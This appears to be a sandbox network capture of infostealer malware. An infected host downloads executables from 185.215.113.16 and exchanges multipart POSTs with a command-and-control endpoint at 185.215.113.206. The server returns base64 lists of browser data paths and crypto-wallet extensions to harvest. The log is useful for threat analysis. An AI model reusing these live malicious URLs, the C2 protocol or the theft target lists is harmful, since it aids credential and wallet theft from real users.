Jan 3, 2025 15:22:17.807988882 CET	1.1.1.1	192.168.2.6	0x2dcf	No error (0)	fallyjustif.click		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:22:33.505502939 CET	1.1.1.1	192.168.2.6	0x32ba	No error (0)	rentry.co		104.26.3.16	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:22:33.505502939 CET	1.1.1.1	192.168.2.6	0x32ba	No error (0)	rentry.co		104.26.2.16	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:22:33.505502939 CET	1.1.1.1	192.168.2.6	0x32ba	No error (0)	rentry.co		172.67.75.40	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 15:21:23.406806946 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Jan 3, 2025 15:21:24.113831997 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 03 Jan 2025 14:21:22 GMT Content-Type: application/octet-stream Content-Length: 5196288 Last-Modified: Fri, 03 Jan 2025 13:54:53 GMT Connection: keep-alive ETag: "6777ec2d-4f4a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 50 4f 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 4f 00 00 04 00 00 d9 fa 4f 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds\|Fir^m[gmKbgdwwEeRichdPELdTg(PO@OO@M$a$$ $$@.rsrc$$@.idata $$@ewuxonpg$$@kebipqmx@O$O@.taggant0PO"(O@
Jan 3, 2025 15:21:24.113852978 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 3, 2025 15:21:24.113863945 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 3, 2025 15:21:24.113876104 CET	372	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 3, 2025 15:21:24.113912106 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 3, 2025 15:21:24.113960981 CET	224	IN	Data Raw: 61 51 6a 31 09 46 bb 3d 61 51 6a 35 09 2e bb 3d 61 1d 76 e8 e9 b3 72 80 2d 51 6d 09 09 1e bb 3d 61 51 6d f5 08 26 bb 3d 61 51 6d 49 09 0e bb 3d 61 51 6d 4d 09 16 bb 3d 61 51 6d 61 09 fe ba 3d 61 51 6d 25 09 06 bb 3d 61 51 6d 39 09 ee ba 3d 61 51 Data Ascii: aQj1F=aQj5.=avr-Qm=aQm&=aQmI=aQmM=aQma=aQm%=aQm9=aQ@=-$}Q=oX=!B+wu~(Om0a&=SnQdI[5&25gP=&p=h!B+wu~(Omx)O}P
Jan 3, 2025 15:21:24.113981962 CET	1236	IN	Data Raw: a7 36 29 fd 84 4f 65 21 ea 25 48 b6 97 2e 29 05 8d 4f 6d 19 ea 0d 60 b6 af 46 29 f5 74 4f 7d 11 ea 15 58 b6 a7 3e 29 c5 e5 d6 af 3d e8 54 2b 3e 61 d6 6f 95 70 e9 af 3d e8 14 54 c2 21 42 a5 b8 7e 3a 2b 8d 75 ce 7c ed fd e3 9b ae 82 d6 74 b8 27 1c Data Ascii: 6)Oe!%H.)Om`F)tO}X>)=T+>aop=T!B~:+u\|t'y-y-Qma=aQm%=aQm9=aQ@=-%)o@=~u(=[5&25gP=o`=!Bwu~(AOm]/a&YSnQd%[5&25gP=o=!B
Jan 3, 2025 15:21:24.114001036 CET	1236	IN	Data Raw: fe 42 b7 c0 7c ce af 11 52 25 7e 8c 54 02 3f 21 61 51 62 35 90 24 d5 32 dd 66 50 3d 89 1a b3 00 61 bd ba d9 ee 39 b0 ba 35 d9 22 04 60 ae 10 3c 61 d6 28 66 e4 a1 5b 28 ea 13 00 c3 21 42 bc ed 91 bd ba 51 d0 39 b0 15 9d db 70 3d 92 bd ba a9 d1 39 Data Ascii: B\|R%~T?!aQb5$2fP=a95"`<a(f[(!BQ9p=9"3(B=aQBB\|R)~T?!aQja$2fP=!B4=KoOR[9[5%25gP=/n"<a(<a(;a(;a"%2gP=&Yt(=aQj
Jan 3, 2025 15:21:24.114011049 CET	1236	IN	Data Raw: 54 02 3f 21 61 25 d5 32 6d 66 50 3d e2 be d4 11 6a 6e bf 12 66 81 ae 3d 61 d6 c8 3f 32 a1 28 85 09 8a a9 3d 61 53 f8 3c e5 99 ab 3d 61 09 d5 bd 3c e2 ff ff 60 d6 5b 30 0a d5 22 e2 45 d6 af 3d 61 15 30 cd 55 a6 71 3d 61 43 de ba a6 d7 c7 db 68 d6 Data Ascii: T?!a%2mfP=jnf=a?2(=aS<=a<`[0"E=a0Uq=aCh~uG19Tj$!aKD=&9[+!B\|u\|3G[Tj$!aKC=&SYSU)~T?!a.t*}TZ?!aQZ]b"`6a(f[
Jan 3, 2025 15:21:24.114022017 CET	1236	IN	Data Raw: 7c be 16 42 61 d6 af 50 21 c9 09 51 21 ae a8 43 61 d6 a0 7d 09 d2 ad 3d 61 51 5a 81 ea 94 c7 87 64 d6 af b8 74 6e 28 0b b9 4b 2a ca fc bd d4 ed 96 bd ba 79 ee 39 b0 c2 21 cd 2a 30 f6 bd d4 f3 fd e3 6f bc 82 d6 28 03 0d ae e4 42 61 d6 28 85 09 8e Data Ascii: \|BaP!Q!Ca}=aQZdtn(Ky9!0o(Ba(=a =2dddd=a<Ca(}$Ca(q,Ca(TBa(\Ba(DBa(LBa(5tBatQ!y-y-#)2a<j=aK_%"`Wa
Jan 3, 2025 15:21:24.118782997 CET	1236	IN	Data Raw: 43 01 ff 12 69 51 ff b6 54 92 3e 21 61 51 5e 41 60 46 ac b8 70 ce 26 0e 69 51 66 35 e4 8f 5b 40 e8 17 a4 b8 a9 ca 2a 77 75 f3 30 47 61 42 90 48 11 43 ae b6 6c 92 3e 21 61 51 7f 41 60 27 ac b8 91 ce 26 ef 68 51 6f 35 e4 96 5b 40 e8 0e a4 ec 9e 21 Data Ascii: CiQT>!aQ^A`Fp&iQf5[@wu0GaBHCl>!aQA`'&hQo5[@!)y-Q}9CNp=2&3!gP=&7=aBNp=a=&=aBNp=a=C0~Qo<a[Bd=a9[2dnA\|(hSSAQBY=ud;wt*wt}"$)
Jan 3, 2025 15:21:28.347158909 CET	204	OUT	GET /mine/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Jan 3, 2025 15:21:28.569200039 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 03 Jan 2025 14:21:27 GMT Content-Type: application/octet-stream Content-Length: 3183616 Last-Modified: Fri, 03 Jan 2025 13:55:02 GMT Connection: keep-alive ETag: "6777ec36-309400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 a0 30 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf0@0F0@Wk00 @.rsrc@.idata @fjvnplhk))@netceafy0n0@.taggant00"r0@

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 15:21:30.779438972 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Jan 3, 2025 15:21:31.496062040 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 14:21:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jan 3, 2025 15:21:31.501859903 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAF Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 32 43 37 34 39 33 34 43 42 45 42 33 32 39 34 35 36 34 35 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 2d 2d 0d 0a Data Ascii: ------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="hwid"C2C74934CBEB3294564547------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="build"stok------JDBFIIEBGCAKKEBFBAAF--
Jan 3, 2025 15:21:31.749769926 CET	407	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 14:21:31 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 57 45 79 59 6a 59 35 4f 47 4e 6a 59 57 46 69 4d 6d 49 32 4e 6a 55 79 4e 6a 64 68 4d 44 4a 6b 59 57 4d 77 5a 57 56 6c 4e 6a 4e 68 4e 32 56 6d 59 57 52 6a 59 7a 6c 6c 4e 7a 4d 31 4f 57 45 35 4f 44 4a 6a 5a 57 59 35 59 7a 4e 6d 4e 57 56 6d 5a 57 5a 6c 4e 7a 51 35 5a 47 4a 69 4f 54 41 7a 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: YWEyYjY5OGNjYWFiMmI2NjUyNjdhMDJkYWMwZWVlNjNhN2VmYWRjYzllNzM1OWE5ODJjZWY5YzNmNWVmZWZlNzQ5ZGJiOTAzfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Jan 3, 2025 15:21:31.754663944 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECAKECAEGDHIECBGHIII Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 61 32 62 36 39 38 63 63 61 61 62 32 62 36 36 35 32 36 37 61 30 32 64 61 63 30 65 65 65 36 33 61 37 65 66 61 64 63 63 39 65 37 33 35 39 61 39 38 32 63 65 66 39 63 33 66 35 65 66 65 66 65 37 34 39 64 62 62 39 30 33 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 49 2d 2d 0d 0a Data Ascii: ------ECAKECAEGDHIECBGHIIIContent-Disposition: form-data; name="token"aa2b698ccaab2b665267a02dac0eee63a7efadcc9e7359a982cef9c3f5efefe749dbb903------ECAKECAEGDHIECBGHIIIContent-Disposition: form-data; name="message"browsers------ECAKECAEGDHIECBGHIII--
Jan 3, 2025 15:21:31.984251022 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 14:21:31 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2028 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
Jan 3, 2025 15:21:31.984277964 CET	1020	IN	Data Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45 Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
Jan 3, 2025 15:21:31.985861063 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIDHDGCBFBKECBFHCAFH Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 61 32 62 36 39 38 63 63 61 61 62 32 62 36 36 35 32 36 37 61 30 32 64 61 63 30 65 65 65 36 33 61 37 65 66 61 64 63 63 39 65 37 33 35 39 61 39 38 32 63 65 66 39 63 33 66 35 65 66 65 66 65 37 34 39 64 62 62 39 30 33 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 48 2d 2d 0d 0a Data Ascii: ------GIDHDGCBFBKECBFHCAFHContent-Disposition: form-data; name="token"aa2b698ccaab2b665267a02dac0eee63a7efadcc9e7359a982cef9c3f5efefe749dbb903------GIDHDGCBFBKECBFHCAFHContent-Disposition: form-data; name="message"plugins------GIDHDGCBFBKECBFHCAFH--
Jan 3, 2025 15:21:32.225676060 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 14:21:32 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Jan 3, 2025 15:21:32.225692034 CET	124	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1k
Jan 3, 2025 15:21:32.225996971 CET	1236	IN	Data Raw: 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 77 78 66 44 42 38 4d 48 78 54 62 32 Data Ascii: cG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2F
Jan 3, 2025 15:21:32.226008892 CET	1236	IN	Data Raw: 55 32 39 73 5a 6d 78 68 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 Data Ascii: U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWN
